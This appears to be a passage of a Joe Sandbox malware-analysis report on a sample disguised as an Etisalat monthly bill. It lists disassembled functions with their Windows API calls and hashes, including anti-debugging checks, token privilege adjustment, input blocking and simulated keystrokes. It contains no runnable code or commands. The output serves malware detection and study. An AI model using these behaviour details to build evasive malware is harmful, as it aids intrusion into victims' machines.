FindFirstFileW.KERNEL32(?,?), ref: 00915CC1
FindNextFileW.KERNEL32(00000000,?), ref: 00915D17
FindClose.KERNEL32(?), ref: 00915D5F

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: 56b7f9dd9ae6171efc03d03253f7902747b2ca304e1f7bb66d24bd30bd44a152
Instruction ID: 05b1e2bd65c3288db4c38d30e2fa2ebe4b848c22a3e54d70ca544aae83a7597e
Opcode Fuzzy Hash: 56b7f9dd9ae6171efc03d03253f7902747b2ca304e1f7bb66d24bd30bd44a152
Instruction Fuzzy Hash: 9E518878704A05DFC714CF28D484A96B7E8FF8A314F16855DE99A8B3A1CB30E884CF91

Function 008D2622 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 008D271A
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 008D2724
UnhandledExceptionFilter.KERNEL32(?), ref: 008D2731

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: cd4fb490790531b5ec565fb7554ef24e6c93b3e68830cb9306232c4a5a2e201c
Instruction ID: c2cbb8731c6598c864fed96f5efea6ffda9feadc5d9badf1e37a71ac183e6093
Opcode Fuzzy Hash: cd4fb490790531b5ec565fb7554ef24e6c93b3e68830cb9306232c4a5a2e201c
Instruction Fuzzy Hash: 0031C675911228ABCB21DF68DC88B99BBB8FF18310F5042DAE41CA7260E7349F818F45

Function 009151CD Relevance: 4.6, APIs: 3, Instructions: 76COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 009151DA
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00915238
SetErrorMode.KERNEL32(00000000), ref: 009152A1

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: 5ecb11e3f4ad7201c5a2f5cb93731477a020fc6a1b5c28c11de221134bf88b09
Instruction ID: 8571e54d4d35edf0dbb83bb3e02c594f9801ed77a6575bd3dcc636af9be30529
Opcode Fuzzy Hash: 5ecb11e3f4ad7201c5a2f5cb93731477a020fc6a1b5c28c11de221134bf88b09
Instruction Fuzzy Hash: 97318C75A04518DFDB00DF94D884EAEBBF4FF49314F098499E805AB3A2CB31E846CB91

Function 009016C3 Relevance: 4.6, APIs: 3, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 008BFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 008C0668
Part of subcall function 008BFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 008C0685

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0090170D
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0090173A
GetLastError.KERNEL32 ref: 0090174A

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
String ID:
API String ID: 577356006-0
Opcode ID: 9e1b565d94b80ac53cc277602949b9a879b74d37288ab39fb599f6d548bfdc57
Instruction ID: 4f4d3649677f841d9b7e04e766e4a96f5122b1b90e9823a57953f3ca80159083
Opcode Fuzzy Hash: 9e1b565d94b80ac53cc277602949b9a879b74d37288ab39fb599f6d548bfdc57
Instruction Fuzzy Hash: 2C119EB2514305AFD728AF54DC86DAAB7BDFB44754B24852EE056A7281EB70FC418B20

Function 0090D5EB Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0090D608
DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 0090D645
CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0090D650

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID:
API String ID: 33631002-0
Opcode ID: 75262eb60cb049db775200f4fd4e9380da9af8fdda39e9fbf0b67a4f613ba757
Instruction ID: 5b1010965cf0765324788959865946ec58347b25c4b5df0bbb79242cd460dd59
Opcode Fuzzy Hash: 75262eb60cb049db775200f4fd4e9380da9af8fdda39e9fbf0b67a4f613ba757
Instruction Fuzzy Hash: B0115EB5E05228BFDB108F95DC45FAFBBBCEB45B50F108115F914F7290D6704A059BA1

Function 00901663 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0090168C
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 009016A1
FreeSid.ADVAPI32(?), ref: 009016B1

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: a426588d4258d849b7a4fa2d22a0f8f626e88dcb2b7500b571cea3b4121d8e48
Instruction ID: 9f262887da095570b0d325ae9362af5e3fdcb6e2df0fa651c56060b0fb02e331
Opcode Fuzzy Hash: a426588d4258d849b7a4fa2d22a0f8f626e88dcb2b7500b571cea3b4121d8e48
Instruction Fuzzy Hash: C2F0F4B195430DFBDF00DFE49D89AAEBBBDEB08704F504565E501E2181E774AA449B50

Function 008C4CE8 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(008D28E9,?,008C4CBE,008D28E9,009688B8,0000000C,008C4E15,008D28E9,00000002,00000000,?,008D28E9), ref: 008C4D09
TerminateProcess.KERNEL32(00000000,?,008C4CBE,008D28E9,009688B8,0000000C,008C4E15,008D28E9,00000002,00000000,?,008D28E9), ref: 008C4D10
ExitProcess.KERNEL32 ref: 008C4D22

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 223e6b759f5c8ae50cc1aee933811cf1d09ee98f8ab3309d9b90a0b5621deb2c
Instruction ID: 5732fa361363b6ee3caecfb68e87ab6a273237184b39b185cd4cfe2a9aca824b
Opcode Fuzzy Hash: 223e6b759f5c8ae50cc1aee933811cf1d09ee98f8ab3309d9b90a0b5621deb2c
Instruction Fuzzy Hash: EBE0B671014548ABCF11BF64DD1AF983B79FB41791B104418FD06DA222CB35DD92EF81

Function 008DC2A2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON

Download Yara Rule

Strings

/, xrefs: 008DC36C

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID:
String ID: /
API String ID: 0-2043925204
Opcode ID: 707e455f2d005388037f4abdc7c19a436469bbff3ea2576e32c5c76044435bee
Instruction ID: 664ecd6e611b9f4fbcd758ba5bf4280d9be2201811378691dd5dfebdcd55d95b
Opcode Fuzzy Hash: 707e455f2d005388037f4abdc7c19a436469bbff3ea2576e32c5c76044435bee
Instruction Fuzzy Hash: 0841267690021AABCB249FB9CC49EBB77B9FB84314F10436AF905D7380E6709D81CB50

Function 008FD27A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 008FD28C

Strings

X64, xrefs: 008FD2A8

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: NameUser
String ID: X64
API String ID: 2645101109-893830106
Opcode ID: 0c3ea7a283b2920e18e149d3d8ad9d3ca5341c3a709f5022de3818ed065ac360
Instruction ID: 00a02389110520fc66aa38f0a9afd8dbc264585633f236865c363592733f6c64
Opcode Fuzzy Hash: 0c3ea7a283b2920e18e149d3d8ad9d3ca5341c3a709f5022de3818ed065ac360
Instruction Fuzzy Hash: 8BD0C9B581521DEACF94DBA0DC88DD9B37CFB04309F100151F206E2100D73095499F10

Function 008CCAA0 Relevance: 3.5, APIs: 2, Instructions: 464COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
Instruction ID: fa422e00e0fc9396f067fb1c4b199e1fffa599102d229db56ff22b486e270376
Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
Instruction Fuzzy Hash: 39021A71E002199BDF14CFA9D880BADBBF1FF49314F25816EE919E7380D731AA418B94

Function 009168EE Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00916918
FindClose.KERNEL32(00000000), ref: 00916961

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 43eb4b0dbfec14b07a99a1f981b54e9d651d9ee918bff3924b648c9b855fd8a8
Instruction ID: 5f5406fa62bc75b110b2361ad77b24a52a71b1a7707f973c7082169219edc66e
Opcode Fuzzy Hash: 43eb4b0dbfec14b07a99a1f981b54e9d651d9ee918bff3924b648c9b855fd8a8
Instruction Fuzzy Hash: 0B11D071A046149FD710DF29C884A16BBE4FF85328F04C699E8698F6A2CB30EC45CB91

Function 009137B5 Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00924891,?,?,00000035,?), ref: 009137E4
FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00924891,?,?,00000035,?), ref: 009137F4

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: ad046fa4ab52f40bb34116b2d432f1439bc10362aca8e197b91687bec6f80e48
Instruction ID: 59d163db49131f07d922ecd068c4a9047573490e597f52225d1876219073101b
Opcode Fuzzy Hash: ad046fa4ab52f40bb34116b2d432f1439bc10362aca8e197b91687bec6f80e48
Instruction Fuzzy Hash: 74F0E5B17083292AEB20176A8C4DFEB3AAEEFC5761F000175F509E22C1D9609D44CBB1

Function 0090B226 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 0090B25D
keybd_event.USER32(?,75A8C0D0,?,00000000), ref: 0090B270

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: InputSendkeybd_event
String ID:
API String ID: 3536248340-0
Opcode ID: cd58375e83042e637dd9828fcd244a758f1e64c1b54e0f5f1306d17e79af6439
Instruction ID: cf11032721abc1c01320bb9ab33970be313b82b7a9aab68339796726c542e741
Opcode Fuzzy Hash: cd58375e83042e637dd9828fcd244a758f1e64c1b54e0f5f1306d17e79af6439
Instruction Fuzzy Hash: D5F01D7181424DAFDB059FA4C805BAE7BB4FF14305F008409F965A5191C37996119F94

Function 009010BF Relevance: 3.0, APIs: 2, Instructions: 24COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,009011FC), ref: 009010D4
CloseHandle.KERNEL32(?,?,009011FC), ref: 009010E9

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 3b448b07378f0e7a2013ae8fd2c8baaa253f91bc8fb33d91388bc7e770732a91
Instruction ID: ffb5745959e671bb7d4f51afa7148538cbe4121fe33c4c81047f7da31e494840
Opcode Fuzzy Hash: 3b448b07378f0e7a2013ae8fd2c8baaa253f91bc8fb33d91388bc7e770732a91
Instruction Fuzzy Hash: 64E0BF72018610EEE7252B55FC05EB777E9FB04310B14882DF5A5945B1DB62ACA0EB50

Function 008ACAF0 Relevance: 1.9, Strings: 1, Instructions: 659COMMON

Download Yara Rule

Strings

Variable is not of type 'Object'., xrefs: 008F0C40

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID:
String ID: Variable is not of type 'Object'.
API String ID: 0-1840281001
Opcode ID: 2a70f69c64acbda3a7ec68bc7eaf498e599b6539d14b92c6622cb511ea8b2c40
Instruction ID: 48c5e9f2aab1e0f18b4f73c6bdbb45092fd45be67c885449262c00aa4bf3b1c5
Opcode Fuzzy Hash: 2a70f69c64acbda3a7ec68bc7eaf498e599b6539d14b92c6622cb511ea8b2c40
Instruction Fuzzy Hash: 8232687090021C9FEF14DFA4C980AEDB7B5FF06318F248059E906EB692DB75AE45CB61

Function 008D676B Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,008D6766,?,?,00000008,?,?,008DFEFE,00000000), ref: 008D6998

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 1ccee7e9bf3aac72f2d63e6dbd29aa80a2012f7c7943f55ef23bf3e8107dc210
Instruction ID: 19d16908d0791b2395a795c6aa8aaf72fc2076bb5596efc4fe6ea539752fdc50
Opcode Fuzzy Hash: 1ccee7e9bf3aac72f2d63e6dbd29aa80a2012f7c7943f55ef23bf3e8107dc210
Instruction Fuzzy Hash: 98B1493161060D9FD715CF28C48AB657BA0FF45368F29865AE8D9CF3A2D335E9A1CB40

Function 008BB119 Relevance: 1.8, Strings: 1, Instructions: 511COMMON

Download Yara Rule

Strings

, xrefs: 008F851F

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 59458db0cc7f4ab69a6d1ec29d211f66822a0287e71c28149f577277be005412
Instruction ID: eb3aa3950265caaa69fe0014dd71e65b6dbe5ea876fdeb1719458ba9d61f856c
Opcode Fuzzy Hash: 59458db0cc7f4ab69a6d1ec29d211f66822a0287e71c28149f577277be005412
Instruction Fuzzy Hash: F3124D71900229DBDB24CF68C8816EEB7F5FF48710F1481AAE949EB351DB709A85CF94

Function 0091EAA2 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 0091EABD

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: b76b545b9b77be823710e4c34876798f53454cf2e8b3b4c5bf1d6ab2840a4d14
Instruction ID: a784e8dd2be110a889c4a132707d7e8eb6a929f51514b3a5ad8cb5b34142a0a9
Opcode Fuzzy Hash: b76b545b9b77be823710e4c34876798f53454cf2e8b3b4c5bf1d6ab2840a4d14
Instruction Fuzzy Hash: 8DE01A362102049FD710EF69D805E9AB7E9FF99760F008416FC4AD7251DAB0A8808B91

Function 008C09D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,008C03EE), ref: 008C09DA

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 9d1afe1b9f499c1e93867b322b5ec24c78e02c511c3a661a0eeec1aab1e800ac
Instruction ID: b625996b6fac9003c8909a6f5cc2e9aa4b8bab71b20c5ed5ddea2bab7c2996a7
Opcode Fuzzy Hash: 9d1afe1b9f499c1e93867b322b5ec24c78e02c511c3a661a0eeec1aab1e800ac
Instruction Fuzzy Hash:

Function 008C781B Relevance: 1.5, Strings: 1, Instructions: 214COMMON

Download Yara Rule

Strings

0, xrefs: 008C798B

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
